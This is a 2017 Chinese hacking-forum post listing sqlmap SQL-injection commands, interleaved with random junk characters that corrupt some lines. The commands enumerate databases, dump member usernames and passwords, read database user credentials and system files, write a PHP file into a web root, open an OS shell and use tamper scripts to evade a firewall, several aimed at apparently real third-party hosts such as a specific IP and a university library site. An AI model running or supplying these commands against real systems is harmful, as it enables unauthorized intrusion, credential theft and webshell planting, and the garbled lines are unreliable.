找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2053|回复: 0
打印 上一主题 下一主题

sqlmap使用实例

[复制链接]
跳转到指定楼层
楼主
发表于 2017-5-19 17:03:10 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
/pentest/database/sqlmap0 p. W5 Z9 H0 f8 g+ F
6 K( s1 K$ D" w( h: J/ P2 {0 o
update :::::>     in the folder   after  execute    following   order : svn update0 w5 D$ G" S3 B1 D; S# b+ E

; a2 e- ]& P6 p- Wsqlmap.py -r 1.txt --current-db# M5 i- Y% h# i4 I" Q

9 D5 Q6 W6 W1 a' T# l! Bv 3 –dbms “MySQL” –technique U -p id –batch –tamper “space2morehash.py”. A8 b0 l$ {9 p; e7 `" Z! q
% M/ A; P  h( u* B) J7 r. u3 I2 i
==================基本使用方法==========================elect (select concat(0x7e,0x27,username,0x3a,password,0x27,0x7e) from phpcms_member limit 0,1))
7 y8 [$ r% w. F6 t猜解数据库
* C  k$ H+ r# S/ f./sqlmap.py -u "injection-url" --dbs
! v7 f% g& u! Esqlmap.py -r 1.txt -v 3 --dbs --tamper "space2morehash.py"8 h* e' {2 m5 p/ U

! }# v2 A3 r1 m) y猜解表名
) m- m0 C& z  b./sqlmap.py -u "injection-url" -D database_name --tables4 P( ]( u3 W% q6 k- @
4 ]! k5 u% v7 U* l
sqlmap.py -r 1.txt -v 1 -D jsst --tables --batch --tamper "space2morehash.py"  `6 ]  y4 f3 e2 E) V& b& U
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member_info --columns --batch --tamper "space2morehash.py"
. z, q5 @' A, Q' T* i+ N: @! T/ m$ h
sqlmap.py -r 1.txt -D mail -T F_domain -C F_email,F_password --dump$ B* K* x1 C- a4 z# j9 t  X6 E

6 A# [3 a( W# T0 {1 @sqlmap.py -r 1.txt -v 1 --os-shell --tamper "chardoubleencode.py"
, C% V& r& T6 a+ T" Qsqlmap.py -r 1.txt -v 3 --os-shell --tamper "chardoubleencode.py"
' u/ N! ~3 C3 l' b* K$ lsqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:\Bitnami\wampstack-5.4.29-0\apache2\htdocs\en\fckeditor\help888.php --tamper "chardoubleencode.py"
7 I( Q* P& a) s; {sqlmap.py -r 1.txt --dbms "Mysql" --os-shell --tamper "charunicodeencode.py"; X: g8 ?& \9 y* A

- P3 l- ^. Y/ H7 Ysqlmap.py -u "http://121.15.0.227/en/list.php?catid=74" --os-shell -v3 --tamper "charunicodeencode.py": T2 ^4 C# ?- p9 k% k
sqlmap.py -r 1.txt -v 3 --sql-query "desc jsgen_member;" --batch --tamper "space2morehash.py"
  m4 D% t0 D8 m, ~- n; M: tsqlmap.py -r 1.txt -v 3 --sql-query "show create table jsgen_member;" --batch --tamper "space2morehash.py"
  k+ P& @2 v1 W" Csqlmap.py -r 1.txt -v 3 --sql-query "select user();" --batch --tamper "space2morehash.py"
+ J0 Z/ g) o1 d) v/ ~& o* g+ _4 Zsqlmap.py -r 1.txt -D jsst -T phpcms_member -C username,password --dump9 p) a  H: y9 r% \
( T) D& c5 O4 P6 s# x! l3 g/ p
sqlmap.py -r 1.txt -v 3 --dbs  --batch --tamper "space2morehash.py" 绕过防火墙了3 F. g8 F, ]6 L
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C ,userid,username,password, --dump --batch --tamper "space2morehash.py"
$ W7 }( H  A6 L1 e3 `' C# I+ \4 M7 y" o
sqlmap.py -r 1.txt --dbms "Mysql" --tables -D "jsst"
* L- U% r. T, @& F! E猜解列名
$ V: J2 q* A( j! b$ O/ @./sqlmap.py -u "injection-url" -D database_name -T table_name --columns
6 Q3 u- J8 n& O* ?3 d% _
; G: e& T: J# k; d& Fsqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member --columns --batch --tamper "space2morehash.py"
8 O2 U- f) W5 T% xsqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_session --columns --batch --tamper "space2morehash.py" 1 E3 M- x( ]  b' V+ b1 I
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C userid,groupid,username,password,touserid,point,modelid,email,areaid --dump --batch --tamper "charunicodeencode.py"3 s5 W2 z+ s% I. q+ _& k/ {( R4 A7 d% ?
* e1 e% j8 I, A% C- [
sqlmap.py -u "http://cityusr.lib.cityu.edu.hk/jspui/simple-search?query=1" --batch --tamper "space2morehash.py"( k6 k# T# d' u9 |4 j! Z. ]  o
&submit=Go
! d$ L1 U% `$ J2 [! _7 G7 V猜解值- e' K- F4 ~4 L  A+ M) n% ^* C4 f7 g6 w
./sqlmap.py -u "injection-url" -D database_name -T table_name -C column1,column2 --dump
! _: j# Y$ a6 ~. q* W' n/ T5 }========================================================
- P1 `) f% f8 R; C2 u/ o搜索表名中包括mana字符的8 I  K+ Q/ }0 v+ K& \
/sqlmap.py -u "injection-url" -T mana --search
8 n2 I$ R* M/ j  R, [+ @6 E返回一个交互式sql shell$ [" Z+ W% Q+ ]' ]
/sqlmap.py -u "injection-url" --sql-shell
+ g/ |/ C9 p4 z* J读取指定文件(需权限)
8 @! a* p5 W' N3 Z. k: M/sqlmap.py -u "injection-url" --file-read "c:\boot.ini"1 c" J" G# }( _) f4 m' ], g9 I; p
查看当前 用户 及 数据库
* ]% p. q$ A2 a, A: z/ R( o* \7 P! h/sqlmap.py -u "injection-url" --current-user --current-db3 k. W7 W% g* M' K& ~9 v. R& D; z; c: p
本地文件 写入 远程目标绝对路径1 ]( C% w5 w% V9 }) x0 t
/sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
! [; }% U2 g. b) s6 hsqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:/Bitnami/wampstack-5.4.29-0/apache2/htdocs/en/fckeditor\help888.php --tamper "charunicodeencode.py"
$ h  Z: E0 S2 K. h( `/ `- N0 _0 @  P& U6 ~; T# Z6 `5 t: C
sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
: ]  m9 P# r" O+ c查看某用的权限
/ ]- t+ Y9 ^7 W/sqlmap.py -u "injection-url" --privileges -U root9 X; l7 k5 c. k. j$ V
查看当前用户是否为dba4 l0 p+ j( U8 S9 O/ p
/sqlmap.py -u "injection-url" --is-dba( c: J  y2 \: L. m- ^3 B
读取所有数据库用户或指定数据库用户的密码
; ^7 W0 z8 c( ?6 z6 B1 f2 O* osqlmap.py -r 1.txt --users --passwords
' c' X4 @- D' J7 M/ J8 T; Z$ _sqlmap.py -r 1.txt -v 3 --users --passwords --batch --tamper "space2morehash.py"
( L/ r+ f! r' K4 ^  Z0 g; `6 v; e' ^( S! e- P1 V
/sqlmap.py -u "injection-url" --passwords -U root, `" @: x# E: s! O+ a  F
# ~5 b$ U3 y& H) T1 W) V* z: S
--start&&--stop 与 --first&&--last 的区别1 S- J8 t; ?; l" x6 g
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D phpcms -T phpcms_member --start=1 --stop=2 --dump   (--start=1 --stop=2 会列出第二条记录。。。。记录例如:0 1 2 3 ……)% ~* f0 [0 t; h5 G7 e
: P' d! K9 U) [! H1 p  l
从字典中查找(属于暴利破解)存在的表(sqlmap/txt/common-tables.txt)或字段(sqlmap/txt/common-columns.txt)' b$ F( z+ E# k; i
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name --common-tables
( d, |  _4 I% m, ~  T9 f" V/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name -T table_name --common-columns
- k% o3 ~, Y9 Q+ @' E/ H/ M4 D4 C) Q( \% X& l# `& t
执行sql语句,如查询@@datadir得到数据库路径(或者user()/database()等等……)5 F; F% j# M4 A
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" --sql-query "select @@ip"
; q: J3 [5 h/ d+ ~% D7 D; j
3 V% l6 q7 p7 Y. k! [; G
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表